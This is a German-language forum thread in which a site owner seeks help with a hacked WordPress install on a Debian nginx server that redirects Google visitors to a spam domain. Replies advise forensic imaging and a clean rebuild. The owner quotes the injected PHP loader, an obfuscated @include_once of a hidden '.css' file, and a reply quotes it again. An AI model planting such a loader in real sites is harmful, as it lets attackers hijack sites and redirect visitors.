Internet Seite die auf nginx debian server läuft und wird umgeleitet in spam seite wenn man sie aus google aufruft.

[ioar]

Hallo zusammen,

ich versuche schon seit einigen Wochen eine Lösung zu folgendem Problem zu finden.
Meine Internet Seite die in debian nginx server läuft und wird umgeleitet in spam seite wenn man sie aus google aus aufruft.

Ich habe sämtliche Lösungsansätze die ich im Internet gefunden habe ausprobiert. Ich habe festgestellt das "meistens" in der index.php im root Ordner der SPAM code geschrieben wird. Ich kann ihn löschen aber nach einem halben Tag ist der Spamcode wieder in der index.php geschrieben. Auch spielt es keine Rolle wie streng die Zugriffsrechte der Ordner bzw. Dateien sind, der unerwünschte code ist nach einem halben Tag wieder da.

Ich verdächtige derzeit das Theme und das wird mein nächster Schritt sein, den zu tauschen. Irgendetwas scheint es auf dem server zu geben, dass diesen Angriff verursacht aber ich finde keine Lösung.

Ich habe alle unnötigen Plugins deinstalliert und gelöscht, die weiterleitung gabs weiterhiin. In den Ordnern des serverseite habe ich nach unerwünschten Dateien gesucht. Derzeit sind die Zugriffsrechte so angeppast, allerdings haben auch strengere rechte auch nicht geholfen.

Code: Alles auswählen

find . -type f -exec chmod 644 {} \; 
find . -type d -exec chmod 755 {} \; 
chown -R www-data /var/www/wordpress 

und die wp-config.php ist auf 444.

Ich habe das wordpress öffters drüber installiert indem ich wp-admin und wp-includes gelöscht und neu reinkopiert habe. Ich habe auch die Seite komplett neu aufgesetzt die umleitung war wieder nach ein paar Tagen da. Das Passwort zum server habe ich geändert. Das passswort zur Datenbank auch.
Der aggresive code sieht so ungefähr aus...

Code: Alles auswählen

/*0beb9*/

$r38xps = "/linux pfad/x2dmedia.com/wp\x2dincl\x75des/block\x2dbindings/.7515af34.css"; if (!isset($r38xps)) {var_dump ($r38xps);} else { @include_once /* 167 */ ($r38xps); }

/*0beb9*/

und leitet auf folgendes um:

Code: Alles auswählen

https://re-captha-version-4-21.buzz/ms/dog/..............

Kann mich jemand konstruktiv unterstützen diesen unterwünschen zusntand zu beheben? Das Hauptproblem ist dass obwohl ich den code lösche nach einem halben Tag der wieder in der index.php geschrieben wird egal welche zugrifsrechte die index hatte.

Hat jemand eine Idee was ich weiterhin machen soll?

Viele Grüße und Danke in voraus.

Ioar

[TRex]

Ich habe sämtliche Lösungsansätze die ich im Internet gefunden habe ausprobiert. Ich habe festgestellt das "meistens" in der index.php im root Ordner der SPAM code geschrieben wird. Ich kann ihn löschen aber nach einem halben Tag ist der Spamcode wieder in der index.php geschrieben. Auch spielt es keine Rolle wie streng die Zugriffsrechte der Ordner bzw. Dateien sind, der unerwünschte code ist nach einem halben Tag wieder da.

Weil der Schadcode bereits im Server ist. Du müsstest nicht fragen, wenn du es besser wüsstest, also betrachte das als einen verlorenen Fall: jemand mit mehr Erfahrung als du hat jetzt deinen Server (und dir noch einen Zugang gelassen, damit das noch eine Weile so hält).

Ursache ist übrigens

wordpress

, weil das so anfällig für Lücken ist. Wenn du also deinen Server neu aufsetzt (das heißt: Kiste komplett zurücksetzen, Backup ohne Befall einspielen), mach nicht die gleichen Fehler wie vorher. Lad dir vielleicht ein Image runter vom Dateisystem und schau, was das Ding angerichtet hat, wenn du die Muse dazu hast.

Edit: bevor mir das "konstruktiv" um die Ohren geschlagen wird: der Schadcode hat sich natürlich besser versteckt als in der index.php.

[schorsch_76]

Naja, wenn "jemand" in dein root Verzeichnis schreiben kann, ist der Server ziemlich sicher nicht mehr nur in deiner Hand.

Wen ein Nutzer 755 Rechte in einem Verzeichnis hat kann er Dateien löschen und neue erstellen. Das Verzeichnis gehört ja ihm.

[debilian]

lösch alles, was mit dem Wordpress zusammen hängt,
das komplette Web und die Datenbank.

dann ist wahrscheinlich wieder Ruhe.
Meistens gehen diese "Hacks" nicht weiter als bis zum Wordpress.

wenn nicht, siehe meine Vorschreiber...

[debilian]

Irgendetwas scheint es auf dem server zu geben, dass diesen Angriff verursacht aber ich finde keine Lösung.

Wordpress wird ständig gehackt, wahrscheinlich über ein plugin,
Kommentarfunktion, Kontaktform etc.

[homer65]

Mein Mitleid hast Du. Unser Schachverein hat selbst eine Wordpress Webseite.
Diese wurde vor ca 5 Jahren gehackt.
Wir haben uns damals professionelle Hilfe gesucht. Hatte ca 200 Euro gekostet.
Das war erfolgreich. Der Schadcode konnte entfernt werden.
Uns wurde das "Wordfence Security" Plugin installiert.
Seitdem machen wir regelmäßige Backups und installieren Updates zeitnah.
Bis jetzt haben wir zum Glück Ruhe.
Aber es stimmt schon Wordpress ist ein sehr beliebtes Angriffsziel.

[ioar]

Hallo zusammen,

ich danke euch sehr für eure Ratschläge und Erklärungen. Das jemand die Kontrolle über meinen Server oder über den Ordner bekommen hat klingt hart,

Ich habe die Seite vorübergehend runtergenommen. Und werde sie neu ansetzen. In einem anderen Verzeichniss mit so wenig plugins wie möglich. Ich habe noch zwei weitere Seiten auf dem gleichen Server die nicht von dem Virus befallen sind. Deshalb würde ich das erstmal so versuchen und wenn mehr zeit vorhanden ist, den
unangenehmen Weg durchführen den Server neu aufzusetzen.

Ich informiere euch wie es gelaufen ist, oder komme mit Fragen auf euch zu...

Danke!

ioar

[Livingston]

Ich habe noch zwei weitere Seiten auf dem gleichen Server die nicht von dem Virus befallen sind.

Da wäre ich seeehr vorsichtig. Es sind ja nicht die ausgelieferten Seiten, die befallen sind, sondern der Server, der sie erstellt. Wenn der Root-Account befallen ist, kannst Du realistisch nicht einschätzen, was sonst noch an fiesen Sachen dort läuft. Und selbst wenn nicht root betroffen ist, fände ich die Sache trotz allem sehr unheimlich und würde mich auf nix mehr verlassen.

[reox]

lösch alles, was mit dem Wordpress zusammen hängt,
das komplette Web und die Datenbank.

Bevor ich irgendwas lösche würde ich versuchen den aktuellen Status zu dokumentieren, um später in Ruhe nach der Ursache suchen zu können. Sonst weiß man ja gar nichts und kann mögliche Schwachstellen nicht absichern.
Idealerweise zieht man sich ein Disk-Image der ganzen Kiste, wenn man kann sogar den RAM im laufenden Betrieb (da es in-memory malware gibt, findet man die möglicherweise nicht auf der platte. Das geht bei einer VM sehr einfach, wenn man denn eine hat. Bei einem rootserver gehts auch aber schwieriger (hätte ich zB auch noch nie gemacht)).
Wenn man diese Vorarbeiten für die Forensik abgeschlossen hat, darf man mit dem munteren löschen bzw neuaufsetzen beginnen Nicht vergessen darf man natürlich auch, dass Backups möglicherweise korrumpiert wurden (jemand an ein write-only backup gedacht?). Somit muss die forensische Analyse sich ebenfalls auf bestehende Backups beziehen.
Ich würde images sogar machen wenn man sich mit forensischer Analyse nicht auskennt. 1) Kann man auf dem gezogenen Image nichts mehr kaputt machen und man hat immer einen Zustand aus dem man Dinge rekonstruieren kann, 2) kann man das lernen bzw das image dann zum lernen verwenden und 3) gibt es ja möglicherweise andere die das können (wenn's denn so wichtig ist, dass man zB jemanden dafür bezahlt)

[uname]

Ich nutze kein Wordpress mehr. Ich nutze nur noch das CSS-Webframework W3.CSS und selbst programmiertes HTML, CSS, PHP und JavaScript.

Was ich machen würde:

- Rausfinden welche Wordpress-Version installiert ist
- Datenbank dumpen, Installation, Konfiguration, Dateien und Datenbank sichern
- Ordner verschieben
- genau die Wordpress-Version downloaden
- Wordpress neu installieren mit altem Ordnernamen (Original ist ja verschoben)
- Dateien rücksichern
- Datenbank zurücksichern
- Wordpress-Konfiguration auf Basis des Backups anpassen
- Plugins möglichst nicht neu installieren, wenn doch aus offizieller Quelle
(Reihenfolge der Schritte mag abweichen)

Mit etwas Glück läuft es wieder und der Schadcode ist weg.


Zum Schadcode:

Code: Alles auswählen

/*0beb9*/
$r38xps = "/linux pfad/x2dmedia.com/wp\x2dincl\x75des/block\x2dbindings/.7515af34.css"; if (!isset($r38xps)) {var_dump ($r38xps);} else { @include_once /* 167 */ ($r38xps); }
/*0beb9*/

Was steht in wp\x2dincl\x75des/block\x2dbindings/.7515af34.css?

[debilian]

- Datenbank zurücksichern

und da kann dann das Problem sein, hatte nun schon mehrere "gehackte" WPs
und da war die Datenbank auch komprimitiert....

@ioar
Kannst auch mal deine wp-config.php angucken,
darin sind meistens andere Datenbank-Daten eingetragen...

gruss

[ioar]

Ich danke euch für die nützlichen Ratschläge. Ich habe (alles) versucht.. sehr hartnäckig der fremdling auf dem System.

Ich bin daraus zum Entschluss gekommen, den Server neu aufzusetzen und einzurichteun, dieses mal bin ich vorsichtiger mit der Auswahl der Plugins und der Passwörtern sowohl im Backend als auch der Datenbank. Die zugrifsrechte der Dateien sind nach Vorschrift und ich lasse kein automatisches installieren der plugins zu. Nur wenn ich Eis brauche schalte ich den Zugriff ein.

Die Internetseiten erstelle ich aufs neue, leider oder auch nicht wieder mit Wordpress - ist halt am einfachsten - mich bitte dafür nicht allzu sehr kritisieren
.

Aus den vorigen Seiten, nehme ich nur die Texte - nicht die Datenbank sondern die Texte habe ich vorher rauskopiert. Das Wordpress habe ich jeweils neu aufgesetzt. Das einzige was ich mit ehme ist mein eigen entworfenes Plugin.

die Problemseite leitet diesmal nicht mehr um.

Jetzt kommen noch die harten Sachen. Webmail Server ...

Ich denke das neuaufsetzen des servers war die richtige Entscheidung. Ist zwar ne Menge Arbeit aber das System ist sauber(er) und sicherer.

Danke euch!